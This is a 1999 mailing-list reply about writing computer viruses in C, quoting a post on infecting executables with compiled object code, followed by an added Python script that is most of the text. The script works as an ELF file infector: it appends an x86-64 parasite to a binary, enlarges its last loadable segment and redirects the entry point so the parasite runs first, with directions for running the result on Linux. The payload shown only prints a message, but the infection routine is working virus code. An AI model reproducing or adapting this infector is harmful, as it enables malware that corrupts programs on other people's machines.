1999-09-17 14:09:06

Re: preliminary C virus results (object code in infection)


Hello! 

Well, basically, C virii have been known for years already. And I 
actually quite disagree with you that they will end asm virii. Not they, 
at least. Look around: 80% (or more) of newly written virii are macro 
ones for M$ products. Today, it has become quite irrelevant in most cases 
to write virii in C, or even in asm. Very few people use pure DOS 
boxes (when those babies come into play); you'd rather be working in Win9x 
or NT or Linux; the last one is actually the only pure C-based OS (well, 
at least for virii). 

So, C virii are not new; moreover, even quite simple virii in C will be 
rather large, not to speak of highly sophisticated ones, which would 
apparently be several tens of K, which is quite inappropriate for a virus. 

Instead, how about telling the C compiler to produce asm output, and then 
simply hand-optimizing it? Or even easier: rewriting the initial program 
loader? This can save you several valuable K bytes ;-) 


-- DAN Fe 

ICQ UIN 38934845 

-----BEGIN PGP PUBLIC KEY BLOCK----- 
Version: PGP 6.5.1 
mQGiBDfVOHURBADvy82iHKSp2mJf48B8ODZDVK57Ey3t7hI0+2Sgo8hvxasXj4U1 
80fsH17As3Cr//Ytylztm5zGEEj5fDBXZBZnVe4Cqrrmd2XHt69NMsnTQ8PeNtJM 
dyKqQJoMHNjZ7itBYoGzK7/W767mcYWw/wF6rxMo970MDgifKJ0ARTyZ3QCg/4ef 
45QBjhacyU4KHBVtOx7XHcsEAJRVTJWucr5YlrRc1ajE2gaSldlGXfty/Jkco1u9 
TpDhzCbv9hwDtDYsbuWs4liZlrm5acN2VExByefR0pZHNLICs2F++FDTFyyKLipE 
ItLs4r53xxfqHY2uRPtcdsZ2H6/oILdjrW8VVvNb+mhyyBeIWXPBSTTWMm4Gc5Kb 
OMb4BADgVGGPsIy9FiVNGJGGJs9l43qLzp7E/Y+K1dG1GfgASfsfP0vJw1d0FpHt 
KAFK3n3yn69sXHylCgBMkmaZ70Bzyy6KYiu8vhMjmd5kZbZAIQU7I3cFCY3awBLg 
FyilgBgP0emvXfd1Dxs2zC1Zj6rDnwyg/H3pNxhmF9unZe7Vl7QrQWxleGV5IE4u 
IERva3VjaGFldiA8ZGFuZmVAaW5ldC5zc2MubnN1LnJ1PokATgQQEQIADgUCN9U4 
dQQLAwECAhkBAAoJEOYKiVHYIXXiMY4An0QMqGCC3q0B13J70ma1XXUs7DwDAKCZ 
440C4Rf4Y9Jr7ZSzrrK7/XjB8LkBDQQ31Th/EAQAzI/1sb59kvd0cSaDEruyv2xc 
T2cWBcUh8meOLWS4l/wcvzQbCkSy8632VJ4bCZRxBJ6ejfMxFCLXubLsXya711+a 
aO5yLzR1xt34riMfMlKAusJM/r/8iU/7MxX4bYD2FPq2UevFGqY7hU6QCmRs2jfz 
IExJgai1zIU8krvZaCEAAgIEAIP4P5wKorzxdf5/8TBZxnHmtrD5ibBA7jmjBIuR 
Gk17X2YSTeUrL5TmuYk1gIdB5HrnEK5jnnXleQ2AMFxWKrF3O3swOMI5YYkhpM0X 
D0yiJMN1DsTv4xiMq1pmxCr02eh62O0hOXrCw4KNzygpBrs1UG+/sZZjwqJJEOB6 
9Pj6iQBGBBgRAgAGBQI31Th/AAoJEOYKiVHYIXXiNZcAn0spfX2hFCESDG6a7ctC 
KQ6vTUdDAJ48rm2KHuu7Kf4ert7/6tSQB1G1gw== 
=Yhg/ 
-----END PGP PUBLIC KEY BLOCK----- 
On Fri, 17 Sep 1999 [email protected] wrote: 
> OK. I've done it. I've infected a host executable with compiled object 
> code. At least I've gotten the new code to execute and leave the host code 
> untouched (without running). Basically, I'm linking the object code manually 
> and inserting the code into the host binary, patching the entry point to jump 
> to main (from the parasite). I'll have to do a few hacks to get the original 
> entry point jumped to again, but I thought it worth writing on. THIS COULD 
> MEAN THE END OF PURE ASM VIRUS :) I'll post code once I've gotten everything 
> working and cleaned up (it's quite hacky, except for the linker code, which 
> was ripped off some previous project I wrote and was quite nice). I really 
> see big things ahead from this result. A C virus could be knocked up in an 
> afternoon by beginners in pure C because there won't be a need to go to asm. 
> I'll throw in some push/pop code to make sure the registers stay clean as 
> well, I suppose. 
> 
> Again, to reiterate, I infected host code without using asm parasite code, 
> but rather parasite code purely derived from C source (object code) :) 
> 
> Hopefully, next time I post, I'll have a C virus written. 
> 
> 
> Silvio 
> 
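The mechanism Silvio describes above (insert linked object code into the host, patch the entry point so the parasite runs first, save/restore registers, then jump back to the original entry) is shown below as an added example; it is not code from either poster. It assumes x86-64 Linux and a constructed one-segment static ELF64 host. The parasite bytes are hand-encoded rather than extracted from a C object file, so that the example runs stand-alone, but they occupy exactly the place the .text of a "hand-linked" C object would: no relocations, no libc, every address computed relative to where the code lands. That constraint is also what DAN Fe's size remark is about: the whole stub here is 46 bytes, which is what you get once the C runtime and loader are left out.

```python
import struct

# Added example: Silvio-style entry-point infection of a minimal ELF64 image.
# Assumptions (not from the posts): x86-64 Linux, a constructed one-segment
# static host, and a hand-encoded parasite standing in for the .text of a
# C object file that has been "linked by hand" (no relocations, no libc).

EHDR = "<4sBBBBB7sHHIQQQIHHHHHH"   # Elf64_Ehdr, 64 bytes
PHDR = "<IIQQQQQQ"                  # Elf64_Phdr, 56 bytes
PT_LOAD, PF_X = 1, 1
BASE, CODE_OFF = 0x400000, 0x80
PARASITE_JMP_OFF = 32               # fixed position of the jmp back (see build_parasite)


def build_host():
    """Constructed host: ELF header, one R+X PT_LOAD, exit(0) stub at 0x80."""
    code = b"\xb8\x3c\x00\x00\x00\x31\xff\x0f\x05"   # mov eax,60; xor edi,edi; syscall
    total = CODE_OFF + len(code)
    ehdr = struct.pack(EHDR, b"\x7fELF", 2, 1, 1, 0, 0, b"\0" * 7,
                       2, 62, 1, BASE + CODE_OFF, 64, 0, 0, 64, 56, 1, 0, 0, 0)
    phdr = struct.pack(PHDR, PT_LOAD, 5, 0, BASE, BASE, total, total, 0x1000)
    img = ehdr + phdr
    return img + b"\0" * (CODE_OFF - len(img)) + code


def build_parasite(parasite_vaddr, orig_entry, msg):
    """Position-independent x86-64 stub: save regs, write(1,msg), restore, jmp orig_entry."""
    head = (b"\x50\x57\x56\x52"          # push rax; push rdi; push rsi; push rdx
            b"\xb8\x01\x00\x00\x00"      # mov eax,1   (SYS_write)
            b"\xbf\x01\x00\x00\x00")     # mov edi,1   (stdout)
    lea_end = len(head) + 7              # lea rsi,[rip+disp32] is 7 bytes; disp counts from its end
    tail = (b"\xba" + struct.pack("<I", len(msg))   # mov edx,len
            + b"\x0f\x05"                           # syscall (clobbers only rcx/r11, which carry
            + b"\x5a\x5e\x5f\x58")                  #   nothing at process entry); then the pops
    jmp_off = lea_end + len(tail)
    msg_off = jmp_off + 5
    assert jmp_off == PARASITE_JMP_OFF
    code = head + b"\x48\x8d\x35" + struct.pack("<i", msg_off - lea_end) + tail
    # jmp rel32 is relative to the next instruction, which is where msg starts
    code += b"\xe9" + struct.pack("<i", orig_entry - (parasite_vaddr + msg_off))
    return code + msg


def infect(img, msg=b"infected\n"):
    """Append the parasite, grow the last PT_LOAD, point e_entry at it."""
    hdr = list(struct.unpack_from(EHDR, img, 0))
    orig_entry, phoff, phnum = hdr[10], hdr[11], hdr[16]
    phdrs = [list(struct.unpack_from(PHDR, img, phoff + i * 56)) for i in range(phnum)]
    loads = [p for p in phdrs if p[0] == PT_LOAD]
    last = max(loads, key=lambda p: p[2] + p[5])        # highest file extent
    # The simple append variant only works if the tail of the file is already
    # mapped executable and carries no bss (memsz > filesz) that the parasite
    # would overlap in memory; anything else needs a new segment or padding.
    if not (last[1] & PF_X) or last[2] + last[5] != len(img) or last[5] != last[6]:
        raise ValueError("last PT_LOAD must be R+X, end at EOF and have no bss")
    parasite_vaddr = last[3] + (len(img) - last[2])
    parasite = build_parasite(parasite_vaddr, orig_entry, msg)
    last[5] += len(parasite)
    last[6] += len(parasite)
    hdr[10] = parasite_vaddr                              # entry now hits the parasite first
    out = bytearray(img + parasite)
    struct.pack_into(EHDR, out, 0, *hdr)
    struct.pack_into(PHDR, out, phoff + phdrs.index(last) * 56, *last)
    return bytes(out)


def entry_of(img):
    return struct.unpack_from("<Q", img, 24)[0]


def vaddr_to_off(img, vaddr):
    phoff = struct.unpack_from("<Q", img, 32)[0]
    phnum = struct.unpack_from("<H", img, 56)[0]
    for i in range(phnum):
        t, _, off, va, _, fsz, _, _ = struct.unpack_from(PHDR, img, phoff + i * 56)
        if t == PT_LOAD and va <= vaddr < va + fsz:
            return off + (vaddr - va)
    raise ValueError("address is not file-backed")


def parasite_jump_target(img):
    """Decode the parasite's jmp back; it must equal the host's original entry."""
    entry = entry_of(img)
    jmp = vaddr_to_off(img, entry) + PARASITE_JMP_OFF
    if img[jmp] != 0xE9:
        raise ValueError("no jmp rel32 at expected offset")
    rel = struct.unpack_from("<i", img, jmp + 1)[0]
    return entry + PARASITE_JMP_OFF + 5 + rel


if __name__ == "__main__":
    host = build_host()
    inf = infect(host)
    print(f"host entry {entry_of(host):#x}, infected entry {entry_of(inf):#x}, "
          f"parasite returns to {parasite_jump_target(inf):#x}, "
          f"size {len(host)} -> {len(inf)} bytes")
```

The host bytes from 0x80 onward are left exactly as they were; only e_entry and the last program header change. Writing either image to disk and marking it executable on a Linux x86-64 box should run it (the host just exits 0; the infected copy prints "infected" first). The check in infect() is the caveat a practitioner wants: appending to the last segment is only correct when that segment is executable, ends at end of file and has no bss, which is why real infectors either pad the text segment or add a PT_LOAD instead.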